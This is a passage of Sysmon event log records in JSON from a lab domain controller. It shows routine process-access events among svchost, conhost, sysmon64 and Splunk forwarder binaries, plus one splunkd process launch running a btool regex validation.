06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.661\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-0010D59A0500}\r\nProcessId: 4792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1105-5F25-0000-00102F9A0500}\r\nParentProcessId: 4780\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.661","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010D59A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1105-5F25-0000-00102F9A0500}","ParentProcessId":"4780","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.651\r\nSourceProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nSourceProcessId: 4780\r\nSourceThreadId: 4768\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D59A0500}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.651","SourceProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","SourceProcessId":"4780","SourceThreadId":"4768","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D59A0500}","TargetProcessId":"4792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
